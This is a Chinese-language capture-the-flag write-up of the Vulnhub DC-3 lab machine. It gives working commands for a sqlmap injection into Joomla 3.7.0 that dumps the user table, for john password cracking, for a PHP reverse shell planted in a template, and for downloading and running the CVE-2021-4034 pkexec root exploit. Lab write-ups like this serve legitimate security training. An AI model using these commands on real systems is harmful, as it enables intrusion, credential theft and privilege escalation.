首页 > 其他分享 >Vulnhub:DC-3靶机

Vulnhub:DC-3靶机

时间:2023-04-03 20:37:08浏览次数:56  
标签:-- DC 192.168 111.250 4034 2021 靶机 CVE Vulnhub

kali:192.168.111.111

靶机:192.168.111.250

信息收集

端口扫描

nmap -A -v -sV -T5 -p- --script=http-enum 192.168.111.250

image

通过nmap得知目标CMS为Joomla 3.7.0

image

漏洞利用

搜索发现该版本存在sql注入

image

image

利用sqlmap获取目标后台用户密码

sqlmap -u "http://192.168.111.250/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --batch -p list[fullordering] -D 'joomladb' -T '#__users' -C 'username,password' --dump

image

得到的密文用john爆破得到密码:snoopy

john hash --wordlist=/usr/share/wordlists/rockyou.txt

image

登录后台写入php反弹shell

image

image

image

image

image

之后访问http://192.168.111.250/templates/beez3/shell.php,获得反弹shell

image

提权

上传linpeas.sh进行信息收集:https://github.com/carlospolop/PEASS-ng/,发现可以内核提权

image

image

CVE-2021-4034提权:https://codeload.github.com/berdav/CVE-2021-4034/zip/main

unzip CVE-2021-4034-main.zip
cd CVE-2021-4034-main
make
./cve-2021-4034

image

flag

image

标签:--,DC,192.168,111.250,4034,2021,靶机,CVE,Vulnhub
From: https://www.cnblogs.com/ctostm/p/17284291.html

相关文章

  • HTB Precious 靶机
    IP端口探测nmap10.10.11.189-A-sV-sS-O-vNmapscanreportfor10.10.11.189Hostisup(0.35slatency).Notshown:998closedtcpports(reset)PORTSTATESERVICEVERSION22/tcpopensshOpenSSH8.4p1Debian5+deb11u1(protocol2.0)|ssh-hostkey:......
  • dxg:GridControl 单元格关联其他单元格的颜色设定
    列样式:<dxg:GridColumn.CellStyle><StyleTargetType="{x:Typedxg:LightweightCellEditor}"><Style.Triggers><DataTriggerValue="T......
  • BOSHIDA 电源模块使用时注意事项 ACDC DCDC
    电源模块需轻拿轻放,避免撞击或跌落造成产品损坏;禁止拆开产品外壳,禁止触摸电源内部任何器件,以避免产品遭受静电、器件应力等易损坏的情况;电源模块通电后,不要靠近模块或触摸外壳,避免模块异常工作时可能对身体造成伤害;在产品通电之前,请确认并严格按照产品技术手册,正确连接产品的输......
  • Vulnhub:DC-1靶机
    kali:192.168.111.111靶机:192.168.111.248信息收集端口扫描nmap-A-v-sV-T5-p---script=http-enum192.168.111.248访问80端口发现CMS为drupal7搜索发现该版本的drupal存在漏洞searchsploitdrupal漏洞利用使用msf的exploit/unix/webapp/drupal_drupalgeddon2......
  • 04_靶机Kioptrix1.2:CMS漏洞利用,使用ht编辑器修改sudoers文件提权,mysql查询
    思路:发现主机后进行目录扫描,发现登录口标注了CMS的版本,查看该类型CMS有没有漏洞,针对漏洞去github搜索脚本,拿到脚本后运行得到靶机的初级Shell,根据靶机内的文件内容指示使用ht编辑器,利用编辑器去修改用户的权限然后提权,拿到root权限结束基操代码不再粘贴首先进行目标靶机地址的......
  • re/【unity】游戏逆向首试 [BJDCTF2020]BJD hamburger competition
    本题是是一个unity游戏,而且是以c#和.net编写尝试直接用idea进行反汇编,但是没有找到运行逻辑,后来在大佬的wp上发现是利用dnspy对c#的dll文件进行返回编,进而获得结果。反汇编BJDhanburgercompetirion_Data中的Assembly-CSharp.dll即可获得如下代码段:可以看到先利用sha1进行加......
  • Acrobat+PRO+DC+PDF+编辑器
    Acrobat+PRO+DC+PDF+编辑器 下载链接https://cloud.189.cn/web/share?code=iquuYrE7Fzq2访问码:sa5u ......
  • Vulnhub:DC-2靶机
    kali:192.168.111.111靶机:192.168.111.249信息收集端口扫描nmap-A-v-sV-T5-p---script=http-enum192.168.111.249wpscan收集目标wordpress用户wpscan--urlhttp://dc-2-eu使用cewl收集目标网站信息生成字典cewlhttp://dc-2/-wpass.txt爆破目标wordpres......
  • Vulnhub:DC-6靶机
    kali:192.168.111.111靶机:192.168.111.247信息收集端口扫描nmap-A-v-sV-T5-p---script=http-enum192.168.111.247访问目标80端口发现重定向到http://wordy,修改/etc/hosts之后访问使用wpscan爆破目标用户wpscan--urlhttp://wordy-eu爆破用的密码字典根据作......
  • 命令行工具 nerdctl
    前面我们介绍了可以使用ctr操作管理containerd镜像容器,但是大家都习惯了使用dockercli,ctr使用起来可能还是不太顺手,为了能够让大家更好的转到containerd上面来,社区提供了一个新的命令行工具:nerdctl。nerdctl是一个与dockercli风格兼容的containerd客户端工具,而且......